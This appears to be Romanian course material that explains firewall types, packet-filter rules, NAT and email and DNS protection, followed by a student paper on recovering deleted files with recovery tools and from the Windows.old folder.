100003 3 udp 2049 nfs
100227 2 udp 2049 nfs_acl
100003 2 tcp 2049 nfs
100227 2 tcp 2049 nfs_acl
100011 1 udp 36613 rquotad
100008 1 udp 36614 walld
100001 2 udp 36614 rstatd

17
FTP si SIP

Proprietati:
• Clientii FTP si alte servicii utilizeaza canale secundare
• Folosesc numere de poart aleatoare
• Filtrarea simpla a pachetelor nu este posibila
• O incercare de creare de reguli simple pe baza pachetelor nu va
functiona

Solutii:
• Clientii FTP trimit comanda PORT pentru a specifica adresa pentru
conexiunea catre interior
• Daca se utilizeaza comanda PASV canalul de date foloseste o
conexiune separata spre exterior;
• Daca politica locala permite conexiuni arbitrare catre exterior
aplicarea metodei da rezultate bune.

18
Rolul filtrelor de pachete

• Filtrele de pachete nu reprezinta o modalitate completa de


implementare firewall
• Cu toate acestea este foarte eficienta si poate fi aplicata chiar pe
legaturile de mare capacitate (de ce?)
• Sunt cateva situatii speciale in care este perfecta;
• Poate fi utilizata pentru a taia conexiunile care nu dorim sa ajunga la
nivel de firewall aplicatie
Outside
Fie structura din figura

DMZ: 192.168.168.42.0/24
Firewall

Mail DNS
Inside: 10.0.0.0/16
19
Exemplu de reguli

Interfata Actiune Adresa Port Flags


Outside Block Src = 10.0.0.0/16
Outside Block src = 192.168.42.0/24
Outside Allow Dst=Mail 25
Outside Block Dst=DNS 53
Outside Allow Dst=DNS UDP
Outside Allow Any ACK
Outside Block Any
DMZ Block Src#192.168.42.0/24
DMZ Allow Dst=10.0.0.0/16 ACK
DMZ Block Dst=10.0.0.0/16
DMZ Allow any
Inside Block Src # 10.0.0.0/16
Inside Allow Dst=Mail 993
Inside Allow Dst=DNS 53
Inside Block dst = 192.168.42.0/24
Inside Allow any

20
Statefull Packet Filters

Caracteristici:
• Cel mai obisnuit tip de filtrare pachete
• Rezolva destul de multe (dar nu toate) din problemele filtrelor simple
de pachete
• Necesita stare pe conexiune in firewall

Pastrarea starii:
• Cand un pachet este trimis in exterior se inregistreaza acest lucru in
memorie;
• Asociaza pachetele spre interior cu starea creata de pachetele catre
exterior

21
Probleme rezolvate, probleme ramase

Probleme rezolvate:
• Poate manipula mesajele UDP de tip cerere/raspuns
• Poate asocia pachetele ICMP cu conexiunea
• Rezolva unele dintre problemele filtrarii in-bound/out-bound, insa
tabelele de stare sunt necesar asociate cu pachetele spre interior
• In continuare necesita blocare pentru address-spoofing

Probleme ramase:
• Inca are probleme cu porturile secundare
• Inca are probleme cu RPC
• Inca are probleme cu semanticile complexe (ca de ex. DNS)
• Multimea starilor ce por fi pastrate este limitata

22
Firewall si Network Address Translators (NAT)

• NAT traslateaza adresa sursa si in anumite cazuri si numerele de


port;
• Uneori in piata se recomanda ca firewall foarte puternice
• In realitate nu sunt mai puternice decat statefull packet filter

Operare NAT
Retea privata Host public
64.236.24.4
Sursa=10.0.1.2
Dest=64.236.24.4 NAT

Host Adresa privata Adresa Adresa


10.0.1.2 Privata Publica
10.0.1.2 129.174.93.21

23
Operare NAT (1)

Sursa=129.174.93.21
Retea privata Dest=64.236.24.4

Sursa=10.0.1.2
Dest=64.236.24.4 NAT
Host public
Host Adresa privata Adresa Adresa 64.236.24.4
10.0.1.2 Privata Publica
10.0.1.2 129.174.93.21

24
Operare NAT (2)

Sursa=129.174.93.21
Retea privata Dest=64.236.24.4 Sursa=129.174.93.21
Dest=64.236.24.4

Sursa=10.0.1.2 Host public


Dest=64.236.24.4 NAT
64.236.24.4

Host Sursa=64.236.24.4
Adresa privata
Dest=129.174.93.21
10.0.1.2

Adresa Adresa
Privata Publica
10.0.1.2 129.174.93.21

25
Operare NAT (3)

Sursa=129.174.93.21
Retea privata Dest=64.236.24.4 Sursa=129.174.93.21
Dest=64.236.24.4

Sursa=10.0.1.2 Host public


Dest=64.236.24.4 NAT 64.236.24.4

Host Sursa=64.236.24.4
Adresa privata
Sursa=64.236.24.4 Dest=129.174.93.21
10.0.1.2
Dest=10.0.1.2

Adresa Adresa
Privata Publica
10.0.1.2 129.174.93.21

26
Comparatie stateful packet filter - NAT

Cele doua opereaza la fel in faza de analiza si decizie daca un pachet


trece sau este distrus. Toate deosebirile apar daca adresa este
translatata sau nu.

Statefull Packet Filter NAT

Out-bound: Scrie intrare in tabela Out-bound: Creaza intrare in


de stare tabela de stare si translateaza
adresa
In-bound: Se uita in tabela de In-bound: Se uita in tabela de
stare si daca nu este intrare stare si daca nu este intrare
prezenta elimina pachetul, daca prezenta elimina pachetul. Daca
exista il inainteaza exista traslateaza adresa si il
inainteaza

27
Relatie firewall – stiva OSI

Efecte pe niveluri:
• Pornind de la limitarile filtrarii pachetelor discutate deja, firewall este
incapabil sa protejeze de atacuri pe layere de nivel inalt OSI;

• Filtrarea pachetelor IP, inclusiv numarul de port nu poate proteja


impotriva pachetelor TCP malitioase;

• Un firewall la nivel TCP nu poate proteja impotriva bugurilor SMTP;

• Proxy SMTP nu poate proteja impotriva problemelor din aplicatiile


de email si alte aplicatii;

28
Filtre pe niveluri

Application/proxy
FTP HTTP TELNET NFS level firewalls

TCP UDP

Network/packet ICMP
filtering firewalls
IP

Link layer
firewalls Ethernet Fddi PPP

29
Avantaje/dezavantaje filtrare pe niveluri

Avantaje:
• Protectia poate fi canalizata pe o aplicatie individuala
• Este disponibila mai multa informatie de context
• Doar aplicatia este afectata, overhead nu este global

Dezavantaje:
• Firewall la nivel aplicatie nu poate proteja impotriva atacurilor la
nivelurile inferioare
• Necesita cate un program separat pentru fiecare aplicatie
• Aceste programe pot fi destul de complexe
• Aceste programe pot fi destul de nepotrivite pentru aplicatiile
utilizator

30
Exemplu: email
Probleme protejare email:
• Protejarea email pe fluxul spre interior sau spre exterior? Codul este
comun, dar pot fi destule deosebiri.
• Actiunea la nivel SMTP (RFC 2821) sau la nivel de continut email (RFC
2822)?
• Ce se intampla cu MIME care extinde formatul email: alte seturi de
caractere decat ASCII, atasamente nontext, continut de mesaj cu parti
multiple, informatii de context in header.
Amenintari:
• Uzual: apararea impotriva erorilor de implementare a protocolului
• Scanarea impotriva virusilor
• Anti spam
• Atacuri prin javascript
• Atacuri prin violarea politicii organizatiei referitoare la email
• Atacuri impotriva verificarii semnaturii

31
Email: mesaje catre interior
• Mesajul email este usor de interceptat prin inregistrarile MX.
• O inregistrare MX (Mail eXchanger record) este un tip de inregistrare
resursa in DNS specificand cum un mail trebuie rutat utilizand SMTP.
Fiecare inregistrare MX contine preferinta si nume host, asa ca o colectie
de inregistrari MX pentru un nume de domeniu dat specifica serverele care
trebuie sa receptioneze mail pentru acel domeniu si prioritatea lor relativa
• Posibilitatea de a utiliza “*” pentru manipularea intregului domeniu. Ex: DNS
aii.pub si *.aii.pub. toate mesajele sunt trimise la masinile terminale
Niveluri de protectie posibile:
• Masina receptoare poate filtra adresele IP realizand protectie la nivel de
retea
• Masina receptoare poate rula un SMTP puternic realizand protectia la
nivel de aplicatie
• Un mail receptionat poate fi scanat la nivel de continut pentru orice tip de
amenintari;
• Firewall poate combina mai multe functii

32
Combinare firewall

Email spre exterior:


• Multe implementari au posibilitatea de a inainta unele / toate mesajele la o
masina specificata
• Se creaza o politica prin care toate mesajele email trec pe la o masina
pentru a fi transmise. Se forteaza aici filtrarea pachetelor

Combinarea tipurilor firewall:


• Utilizarea unei aplicatii firewall ce manipuleaza atat email spre interior cat si
spre exterior
• Utilizarea filtrelor de pachete pentru implementarea regulilor

33
Protejare email prin firewall

Outside

DMZ
Filtru
Pachete
SMTP Anti spam
Receiver Anti virus

Inside

34
Politici privind protectia email
Stabilirea unui flux pentru mesajele email

La email catre interior:


• Numai un server SMTP din exterior poate discuta cu SMTP receiver
• SMTP receiver inainteaza email la filtrele anti-spam/anti-virus prin
anumite protocoale
• Aceste masini discuta cu SMTP printr-un mail gateway din interiorul
zonei protejate
• Efect benefic: Daca SNMP receiver este compromis nu poate
discuta direct cu interiorul zonei protejate

La email catre exterior:


• Se utilizeaza filtrarea pachetelor pentru a bloca conexiunile catre
exterior cu portul 25
• Singura masina care poate discuta cu un SMTP exterior este un
gateway email dedicat mesajelor catre exterior
• Acest gateway poate fi plasat fie in interior, fie in DMZ

35
Solutii DNS
UDP:
• Localizarea server DNS in DMZ; De fapt utilizarea unui nivel
aplicatie care sa lucreze cu restrictiile de fitrarea pachetelor;
• DNS nu necesita schimbari in aplicatie care sa faciliteze acest
lucru.
Perspectiva interna fata de cea externa:
• Pot cei din exterior sa vada numele masinilor interne? Solutie:
utilizarea a doua servere DNS, unul pentru cereri interne, altul
pentru cereri externe
• Dispunerea unui firewall in fiecare parte;
• Trebuie asigurat ca masinile interne nu vad inregistrarile name
server ca apoi sa incerce iesirea in exterior direct.
Atacuri prin contaminare cache:
• Serverele DNS pastreaza in cache rezultatele cererilor;
• Raspunsurile pot contine informatii aditionale ce pot fi utile, dar nu
sunt parti ale raspunsului la cerere;
• Cale atac: Trimiterea de inregistrari fictive ca informatii aditionale
pentru a face urmatoarele cereri confuze.
36
Filtrare DNS

• Toate cererile interne DNS merg la DNS switch;


• Daca o cerere interna este inaintata la un server intern sau se da inapoi
raspunsul cu inregistrarea NS interna;
• Daca este o cerere externa inainteaza cererea catre alta locatie, dar:
– Curata rezultatul prin inlaturarea oricarei referinte la masinile interne;
– Curata rezultatul prin inlaturarea oricarei referinte la inregistrari name server.
• Utilizeaza o filtrare de pachete pentru a bloca comunicatia DNS directa.

Aplicatii gateway mici:


• La anumite aplicatii simpla filtrare de pachete nu este adecvata;
• Solutia: examinarea traficului printr-un proxy specific si reactie
corespunzatoare

37
Atacuri prin FTP Proxy

Caracterizari:
• Va reamintiti utilizarea comenzii PORT?
• Daca apare o comanda PORT, se anunta firewall sa deschida acel port
temporar pentru primirea unei conexiuni;
• Aceeasi situatie cu RPC – definirea filtrelor bazate pe aplicatii RPC, nu pe
numere port.

Atacuri prin proxy:


• Appleturile Java descarcate pot apela masina originala;
• Un applet rau intentionat poate deschide un canal FTP si poate da o
comanda PORT provocand deschiderea portului pe o masina care altfel era
protejata
• Firewall o va trata ca pe o conexiune valida;
• Solutia: firewall senzitiv la ce host si port poate aparea in comenzile de tip
PORT.

38
Personal firewall

Caracteristici:
• Adaugate la principalele protocoale din stiva;
• Prin termenul ‘inside’ se intelege masina, orice altceva este ‘outside’;
• Cele mai multe actioneraza ca filtre de pachete;
• Setul de reguli poate fi definit individual sau de administrator.

Probleme:
• Este simplu sa rejectam protocoale, nu este asemanator cu personal
firewall;
• Partea dificila: raspuns afirmativ in conditii de siguranta;
• Nu putem vorbi de topologie – tot ce avem este adresa IP a
transmitatorului;
• Inlocuirea adresei IP nu este foarte dificila, mai ales la pachete UDP.

39
Application-Linked Firewalls

• Cele mai multe firewall personale actioneaza la numere port;

• Cel putin un astfel de firewall securizeaza aplicatii – programelor


individuale le este permis sau nu sa discute local sau global;

• Nu ingrijoreaza numerele de port criptice: sunt manipulate foarte bine


porturile auxiliare;

• Numele aplicatiilor pot fi de asemenea criptice; aplicatiile opereaza in


folosul unor alte aplicatii.

40
Distributed Firewalls

• Din unele puncte de vedere sunt similare cu personal firewall aflate direct
sub controlul politicii centrale;

• Se utilizeaza IPsec pentru a face distinctia intre “inside” si “outside”;

• Cei din interior detin certificate, cei din exterior nu;

• Numai masinile cu certificat propriu sunt de incredere fata de alte masini;

• Nu se sprijina pe topologie: laptopuri din interior sunt protejate cand


calatoresc, cele din exterior nu sunt un pericol atunci cand ne viziteaza.
.

41
Probleme suplimentare (1)

Intentii rele in interior:


• Un firewall presupune ca toti cei din interior sint OK, ceea ce nu este
totdeauna adevarat;
• Cei din interior pot provoca stricaciuni mari intrucat nu sunt controlati (ex:
deschidere proxy peste canale criptate);

Echipamente mobile:
• Cand un echipament mobil este in afara zonei de protectie a firewall cum va
fi protejat?
• Solutie posibila: Personal firewall si securizarea/inchiderea tuturor serviciilor
ne-necesare.

42
Probleme suplimentare (2)

Conectivitatea dinamica:
• Firewall se sprijina pe topologie si servicii statice;
• Daca sunt prea multe conexiuni, unele vor ocoli firewall;
• La anumite momente nu este posibil sa protejeze efectiv toate legaturile
externe;
• Companiile mari pot avea sute sau mii de conexiuni externe multe fiind
necunoscute de catre personalul ce administreaza reteaua.

Eschivare (evitare):
• Firewall sau administrator firewall nu sunt suficient de bune;
• Unele dintre aplicatii nu sunt capabile de ruleze;
• Furnizorii initializeaza conexiunea crezand ca ruleaza peste porturi
cunoscute apriori;
• Conexiunile HTTP se realizeaza uzual peste firewall si chiar web proxy.

43
Tema: Sisteme de recuperare a informațiilor după
ștergere

Introducere

Pierderea accidentală a datelor constituie o problemă majoră pe care fiecare utilizator a întâlnit-
o cel puţin o dată. Fie că este vorba de ştergerea unor fişiere, de formatarea întregului hard disk, de
pierderea informaţiilor conţinute în sectorul de boot, de o partiţionare greşită sau chiar de atacul unui
virus, oricare dintre aceste neplăcute şi neaşteptate evenimente poate avea consecinţe foarte grave
asupra datelor importante şi, implicit, asupra utilizatorului. În general, acesta se simte în siguranţă,
creează, modifică şi salvează datele sale importante pe un singur hard disk, însă, rareori se gândeşte
la transferul acestora pe un alt mediu de stocare magnetic sau optic, iar, chiar dacă acest lucru se
întîmplă, el nu are un caracter periodic. În prezent, soluţiile de stocare ale copiilor de siguranţă
(backup) sunt la îndemâna oricui, de la clasica dischetă pentru fişiere de dimensiuni mici, continuând
cu accesibilul CD sau CD-RW şi noile venite, DVD-urile, cardurile de memorie Compact Flash,
Smart Media, Secure Digital etc.

Cauzele care conduc la pierderea datelor sunt numeroase şi, de cele mai multe ori,
neprevăzute: fluctuaţii sau întreruperi bruşte ale curentului electric, atacuri ale unor viruşi, neatenţia
utilizatorului în momentul ştergerii voluntare a unor fişiere, diverse erori apărute în momentul
schimbării tabelei de partiţii, a sistemului FAT, şocuri mecanice etc.

Indiferent de situaţie, nu este cazul să ne facem griji. Fişierele sunt în continuare în siguranţă
pe hard-disk şi în mod cert pot fi accesate în continuare cu ajutorul unui program de recuperare a
fișierelor șterse, chiar dacă acestea nu sunt vizibile în directorul respectiv.

În lucrarea de față sînt explicate motivele pentru care un fişier poate fi recuperat şi după ce a
fost şters şi sunt prezentate cîteva dintre cele mai importante programe gratuite şi contra-cost care pot
rezolva asemenea probleme.

2
1. Recuperarea fișierelor șterse

Oricare ar fi cauzele, informațiile trebuiesc recuperate. În unele cazuri poate fi mai ușor, în
altele mai dificil. Dar mai întîi trebuie să înțelegem cum se pierd fișierele.
În momentul în care ştergi un fişier de pe PC, în mod implicit Windows trimite fișierele șterse
în Recycle Bin, dar nu sunt şterse în mod fizic de pe hard-disk, ci doar îndepărtat din directorul în
care se afla. Aflînduse în Recycle Bin, pot fi restaurate prin deschiderea Recycle Bin-ului, selectarea
acestora și apăsarea butonului Restore. Dacă Recycle Bin a fost golit, însă, misiunea se complică, dar
nu devine imposibilă. Chiar dacă fişierul a fost șters din Recycle Bin, acesta este în continuare
prezent pe hard-disk, chiar dacă sistemul de operare ne spune că spaţiul alocat fişierului respectiv a
fost eliberat. Acest lucru se întâmplă pentru că sistemul de operare nu utilizează imediat spaţiul
eliberat prin ştergerea fişierului. Cu alte cuvinte, fişierul devine irecuperabil doar în momentul în care
spaţiul alocat pentru fişierul respectiv este alocat unui alt fişier. De aceea, şansele de a recupera un
fişier şters accidental sunt cu atît mai mari cu cît timpul care a trecut de la această operaţiune este mai
mic. Din acest motiv, este recomandat ca documentele și fișierele importante să fie ținute pe o partiție
separată. Dacă acestea sunt ținute pe partiția sistemului de operare acestea riscă să fie suprascrise
foarte repede, datorită oprerațiunilor constante de scriere/citire afectuate de acesta.
Primul pas este să… nu faci nimic!
După ce s-a constatat că a fost şters din greşeală un fişier, cel mai important lucru este să nu
facem nimic. Pentru a avea şanse cît mai mari de a recupera fişierul respectiv trebuie să se evite
orice contact cu hard-disk-ul sau partiţia pe care era fişierul. Asta înseamnă că nu trebuie să se
copieze alte fişiere, să instaleze programe, să se navigheze pe internet şi, mai ales, să nu se
defragmenteze hard-disk-ul sau partiţia hard-disk-ului.
Regula de aur a unui program de recuperare
Nu se utilizează un program de recuperare a fişierelor pe hard-disk-ul sau partiţia de pe care se
dorește recuperarea datelor! Această regulă este foarte importantă, întrucât dacă este încălcată există
riscul să se suprascrie exact fişierul pierdut, caz în care nu va mai fi posibilă recuperarea fişierului în
cauză.
Dacă este un singur hard-disk cu o singură partiţie, se utilizează programul de recuperare a
datelor fie de pe un hard-disk extern, fie de pe un stick USB. Chiar şi această soluţie este periculoasă

3
dacă programul necesită instalarea unor fişiere proprii pe partiţia în care este instalat sistemul de
operare (de regulă, în C://Windows). De aceea, se recomandarea să se stocheze toate fişierele
importante pe o altă partiţie sau pe un alt hard-disk decît cel pe care este instalat sistemul de operare.

1.1. Programe gratuite de recuperare a datelor


Pe piaţă există numeroase programe de recuperare a datelor, însă numai câteva dintre acestea sunt
gratuite. Teoretic, există soluţii gratuite care îşi fac treaba la fel de bine ca cele contra-cost, însă în
principiu acestea sunt utile în special pentru fişierele şterse cu puţin timp în urmă. Dacă vrei să
recuperezi fişiere şterse în urmă cu cîteva luni, soluţia optimă este să apelezi la un program contra-
cost.

1. Recuva (pronounced "recover") este unul dintre cele mai cunoscute programe gratuite
pentru recuperarea datelor, fiind apreciat atît pentru recupararea datelor în sine, cît şi pentru interfaţa
simplă şi uşor de utilizat. Poate recupera fișiere din Recycle bin, inclusiv documente Microsoft
Office pe care nu ai apucat să le salvezi, cît și imagini și alte fișiere șterse accidental de pe cartela de
memorie a camerei digitale sau MP3 playere, muzica stocată pe iPod sau emailuri. Există şi în
varianta portabilă.
2. Data Recovery Wizard Free Edition – Aplicaţia dezvoltată de Ease US permite,
potrivit producătorului, salvarea inclusiv a fişierelor de pe HDD-uri formatate fără a continua
căutarea fişierelor pierdute fără scanarea repetată a unității, de pe USB, carduri de memorie, camera
digitale, telefoane mobile, playere și alte suporturi. De asemenea, pot fi căutate doar anumite extensii
de fişiere, însă partea mai puţin plăcută este că se poate salva gratuit doar 1 GB de data. De aceea,
pentru muzică şi filme ar trebui de ales alte soluţii.
Este suportat de următoarele SO:Windows 8.1/8/7/Vista/XP/2000 and Windows Server
2012/2008/2003
3. Panda Recovery – Programul îţi permite să salvezi fişiere şterse accidental de pe o
varietate de produse (HDD-uri, HDD-uri externe, stick-uri USB) şi poţi utiliza şi funcţia de căutare
dacă ştii măcar parţial numele sau extensia fişierelor. Din păcate, programul nu este compatibil cu
Windows 7, iar versiunea portabilă este disponibilă contra cost

4
4. Windows 7 restore previous - Windows 7 include un program de backup automat
botezat Windows 7 Restore Previous, care poate ajuta la restaurarea fişierelor şterse din greşeală. Mai
întîi, trebuie de activat serviciul System Protection (click dreapta pe Computer – Properties – System
Protection – Configure şi selectăm prima opţiune). Ulterior, dacă ştergem un fişier din greşeală, tot ce
avem de făcut este să parcurgem paşii: click dreapta pe director – Properties – Previous Versions, iar
de acolo selectăm una dintre versiunile mai vechi ale directorului. Chiar dacă este cea mai simplă,
această metodă nu este foarte eficientă, întrucât este posibil ca sistemul să nu fi apucat să facă backup
automat înainte ca să ştergem un anumit fişier.

5
1.2. Programe contra-cost, de recuperare a datelor
Programele de recuperare a datelor contra-cost sunt mai eficiente în cazul datelor pierdute în
urmă cu câteva luni, însă preţurile acestora sunt destul de ridicate. De aceea, îţi recomandăm să
apelezi la ele doar după ce încercările de a recupera date cu un program gratuit au eşuat. Şi nu uita:
niciun program nu oferă o garanţie de 100% privind recuperarea datelor pierdute.

1. Recover My Files – Este unul dintre cele mai populare programe pentru recuperarea datelor şi
permite inclusiv restaurarea întregului hard-disk, pe lîngă posibilitatea de a previzualiza fişierele
înainte de salvare. Partea bună este că putem utiliza programul gratuit pentru căutare şi să
achiziţionăm o cheie de activare doar dacă fişierele pierdute sunt găsite.

Ads not by this site

Recover My Files

2. MunSoft Data Recovery System – Cea mai scumpă suită de recuperare de date promite că
salvează inclusiv fişierele vechi şi vine într-o multitudine de versiuni mai ieftine care recuperează
doar fişiere cu extensii specifice. De exemplu, există un program de recuperat poze şterse, dar şi
versiuni pentru fișiere Office, arhive, tipuri de partiţii şi altele.

6
MunSoft Data Recovery System

3. GetDataBack – În ciuda interfeţei spartane, GetDataBack îşi face bine treaba şi recuperează
datele inclusiv dacă tabela de partiţii a fost deteriorată, dacă datele au fost şterse de un virus sau dacă
hard-disk-ul a fost formatat. În plus, beneficiezi de update gratuit pe viaţă la versiunile ulterioare.

GetDataBack

4. Data Recovery Software – Producătorul aplicaţiei susţine că poate recupera rapid inclusiv
fişierele de mici dimensiuni, care uneori sunt “uitate” de alte aplicaţii. Funcţia este utilă dacă ai un
dcument de câţiva KB care conţine însă informaţii preţioase pe care trebuie neapărat să le recuperezi.

Ads not by this site

7
Data Recovery Software

5. Disk Doctors – Pe numele său complet Disk Doctors Instant File Recovery, programul
mizează pe rapiditatea cu care recuperează date, inclusiv în cazul formatărilor accidentale, atacurilor
cu viruşi sau căderii bruşte a curentului electric. Din păcate, nu are versiune şi pentru Windows 7.

2. Cîteva situații care necesită restabilirea datelor șterse


2.1. Restabilirea datelor personale după efectuarea unei instalări
particularizate de Windows 7
În acest capitol este descris cum se restabilesc fișierele personale după efectuarea instalării
particularizate de Windows Vista sau Windows 7.
În anumite scenarii, este posibil să nu reușiți să efectuați un upgrade de la o versiune
anterioară de Windows. Dacă nu aveți posibilitatea să faceți upgrade, este posibil să trebuiască să
efectuați o instalare particularizată. Când efectuați o instalare particularizată de Windows Vista sau
Windows 7, Windows creează un folder Windows.old care conține fișierele din sistemul anterior.
Probabil că doriți să restabiliți fișierele personale din folderul Windows.old și să le mutați în
instalarea particularizată.
Dacă sistemul de operare anterior a fost Windows XP
Pentru a restabili fișierele personale din folderul Windows.old, găsiți folderele care conțin
fișierele. Apoi, mutați fișierele în folderele corespunzătoare din instalarea curentă de Windows.

8
Important Se recomandă să nu ștergeți niciun fișier sau folder înainte să verificați că toate
fișierele personale au fost mutate cu succes în actuala instalare de Windows.

Folderul Windows.old
Când instalați Windows Vista sau Windows 7, se creează folderul Windows.old. Programul de
instalare creează acest folder pentru a stoca fișierele din instalarea Windows XP. Pentru a găsi

folderul Windows.old în Windows Vista sau Windows 7, faceți clic pe Start , tastați
unitate:\windows.old (de exemplu, c:\windows.old) în caseta Pornire căutare, apoi faceți clic pe
Windows.old în lista Programe.

Dacă vi se solicită o parolă de administrator sau o confirmare, tastați parola sau faceți clic pe
Continuare.
Folderul Windows.old conține următoarele foldere din instalarea Windows XP:

1. unitate:\Windows.old\Windows
2. unitate:\Windows.old\Documents and Settings
3. unitate:\Windows.old\Program Files

Folderul „Documents and Settings”


Majoritatea programelor stochează fișierele personale ale unui utilizator în folderul
„Documents and Settings”. În general, nu veți găsi fișiere personale în folderul Windows sau folderul
Program Files. Folderul „Documents and Settings” conține cîte un folder pentru fiecare utilizator care
a făcut log on pe computer în Windows XP.

De exemplu, în folderul„unitate:\Windows.old\Documents and Settings” apar următoarele


foldere: unitate:\Windows.old\Documents and Settings\Administrator

Dacă nu s-a utilizat contul Administrator pentru a face log on în Windows XP, acest folder este
posibil să nu conțină deloc fișiere personale.
 unitate:\Windows.old\Documents and Settings\All Users
Dacă ați utilizat caracteristica Fișiere partajate în Windows XP, fișierele partajate se află în folderul
All Users. De exemplu, acest folder conține emisiunile TV înregistrate pe computere care execută
Windows Media Center Edition 2005. Deschideți folderele din folderul All Users pentru a găsi toate
fișierele pe care doriți să le păstrați. Apoi, copiați aceste fișiere într-o locație nouă care se află în
afara structurii folderului Windows.old.
 unitate:\Windows.old\Documents and Settings\Numeutilizator
Majoritatea fișierelor personale se află în foldere care sunt etichetate pentru fiecare utilizator
care a făcut log on pe computer în Windows XP.

9
Folderele utilizatorilor
Majoritatea fișierelor personale se află în următoarea locație:
unitate:\Windows.old\Documents and Settings\Numeutilizator
Acest folder conține următoarele trei foldere:
 unitate:\Windows.old\Documents and Settings\Numeutilizator\Cookies
 unitate:\Windows.old\Documents and Settings\Numeutilizator\Start Menu
 unitate:\Windows.old\Documents and Settings\Numeutilizator\UserData
De obicei, aceste trei foldere nu conțin date de utilizator importante. Următoarele trei foldere se află,
de asemenea, în folderul „unitate:\Windows.old\Documents and Settings\Numeutilizator”:
 unitate:\Windows.old\Documents and Settings\Numeutilizator\Desktop
 unitate:\Windows.old\Documents and Settings\Numeutilizator\Favorites
 unitate:\Windows.old\Documents and Settings\Numeutilizator\My Documents
De obicei, aceste trei foldere conțin majoritatea fișierelor personale importante din instalarea
Windows XP.
Restabilirea fișierelor personale
Pentru a restabili fișierele personale din instalarea Windows XP, urmați acești pași.

Pasul 1: Restabilirea emisiunilor TV înregistrate


Implicit, Windows Media Center 2005 salvează emisiunile TV înregistrate în folderul Recorded TV.
Pentru a restabili aceste fișiere, urmați acești pași:
1. Găsiți folderul Windows.old, apoi deschideți următorul folder:
Documents and Settings\All Users\Documents\Recorded TV
Notă Calea poate fi și următoarea:
Documents and Settings\All Users\Shared Documents\Recorded TV
2. Faceți clic cu butonul din dreapta pe Înregistrare TV, apoi faceți clic pe Decupare.

3. Faceți clic pe Start , apoi faceți clic pe numele de utilizator din colțul din dreapta sus al
meniului Start.
4. Faceți clic cu butonul din dreapta pe folderul Video sau Fișierele mele video, apoi faceți clic
pe Lipire.
Windows mută fișierele cu emisiunile TV înregistrate în folderul Video.
Pasul 2: Restabilirea preferințelor Internet Explorer
Pentru a muta conținutul folderului Favorites din instalarea Windows XP în Windows Vista sau
în Windows 7, urmați acești pași:
1. Găsiți folderul Windows.old, apoi deschideți folderul următor:
Documents and Settings\Numeutilizator\Favorites

10
2. Apăsați CTRL+A pentru a selecta toate elementele din folderul Favorites. Apoi, apăsați
CTRL+X pentru a muta elementele din folderul Favorites în clipboardul Windows Vista.

3. Faceți clic pe Start , apoi faceți clic pe numele dvs. de utilizator din colțul din dreapta sus
al meniului Start.
4. Faceți clic cu butonul din dreapta pe Preferințe, apoi faceți clic pe Lipire.
Windows mută fișierele din Preferințe Internet Explorer în folderul Preferințe.
Pasul 3: Restabilirea folderului Desktop
Dacă nu ați stocat niciun fișier sau date pe desktopul Windows XP, ignorați acest pas. Aveți
posibilitatea să deschideți folderul Desktop din folderul Windows.old pentru a verifica dacă pe
desktopul Windows XP s-au aflat numai comenzi rapide și niciun fișier de date.
Pentru a restabili folderul Desktop din instalarea Windows XP, urmați acești pași:
1. Găsiți folderul Windows.old, apoi deschideți folderul următor:
Documents and Settings\Numeutilizator
2. Faceți clic cu butonul din dreapta pe Desktop, apoi faceți clic pe Decupare.
3. Închideți toate ferestrele deschise.
4. Faceți clic cu butonul din dreapta pe o zonă goală de pe desktop, apoi faceți clic pe Lipire.
Apare folderul Desktop Windows XP ca o pictogramă pe desktopul curent.
Pasul 4: Restabilirea folderului Documentele mele
De obicei, majoritatea fișierelor personale se stochează în folderul Documentele mele din
Windows XP. Deși aveți posibilitatea să mutați acest folder în orice locație din Windows, se
recomandă să îl mutați în folderul Documente. Apoi, veți avea posibilitatea să găsiți mai ușor aceste
fișiere în versiunea curentă de Windows. Pentru a muta folderul Documentele mele, urmați acești
pași:
1. Găsiți folderul Windows.old, apoi deschideți folderul următor:
Documents and Settings\Numeutilizator
2. Faceți clic cu butonul din dreapta pe My Documents, apoi faceți clic pe Decupare.

3. Faceți clic pe Start , apoi faceți clic pe Documente.


4. Faceți clic cu butonul din dreapta pe Documente, apoi faceți clic pe Lipire.
Windows copiază folderul My Documents împreună cu conținutul său în folderul curent Documente.
Restabilirea fișierelor și folderelor altor utilizatori
Dacă alți utilizatori au făcut log on pe computer în Windows XP, urmați pașii din secțiunea
„Restabilirea fișierelor personale” pentru a restabili datele celorlalți utilizatori. Când efectuați
aceasta, este util să faceți log on în Windows Vista sau Windows 7 ca utilizator distinct, pentru

11
fiecare utilizator Windows XP care are date pe computer. Acest lucru poate contribui la păstrarea
separată a datelor fiecărui utilizator în instalarea curentă de Windows.
Restabilirea altor fișiere și foldere din folderul Windows.old
După ce restabiliți toate folderele personale din instalarea Windows XP, examinați folderul
Windows.old pentru a determina dacă există alte foldere care conțin date personale.
Important Asigurați-vă că ați mutat toate datele importante înainte de a șterge folderul
Windows.old.
Dacă sistemul de operare anterior a fost Windows Vista
Pentru a restabili fișierele personale din folderul Windows.old, găsiți folderele care conțin
fișierele. Apoi, mutați fișierele în folderele corespunzătoare din instalarea curentă de Windows.
Găsiți fișierele personale
După ce instalați Windows Vista sau Windows 7, mutați fișierele personale din fostele foldere
în folderele corespunzătoare.
Important Se recomandă să nu ștergeți niciun fișier sau folder înainte de a verifica dacă toate
fișierele personale au fost mutate cu succes în actuala instalare de Windows.
Folderul Windows.old
Când efectuați o instalare particularizată de Windows Vista sau Windows 7, folderul
Windows.old este creat din nou. Programele de instalare creează acest folder pentru a stoca fișierele
din instalarea anterioară de Windows XP sau Windows Vista. Pentru a găsi folderul Windows.old în

Windows Vista sau Windows 7, faceți clic pe Start , tastați unitate:\windows.old (de exemplu,
c:\windows.old) în caseta Pornire căutare, apoi faceți clic pe Windows.old.
Dacă vi se solicită o parolă de administrator sau o confirmare, tastați parola sau faceți clic pe
Continuare.
Folderul Windows.old conține următoarele foldere din instalarea Windows Vista:
1. unitate:\Windows.old\Windows
2. unitate:\Windows.old\Utilizatori
3. unitate:\Windows.old\Program Files
Folderul „Utilizatori”
Majoritatea programelor stochează fișierele personale ale unui utilizator în folderul
„Utilizatori”. În general, nu veți găsi fișiere personale în folderul Windows sau folderul Program
Files. Folderul „Utilizatori” conține câte un folder pentru fiecare utilizator care a făcut log on pe
computer în Windows Vista.
De exemplu, următoarele foldere apar în folderul „unitate:\Windows.old\Utilizatori”:
 unitate:\Windows.old\Utilizatori\Public

12
Dacă ați utilizat caracteristica Fișiere partajate în Windows Vista, fișierele partajate se află în
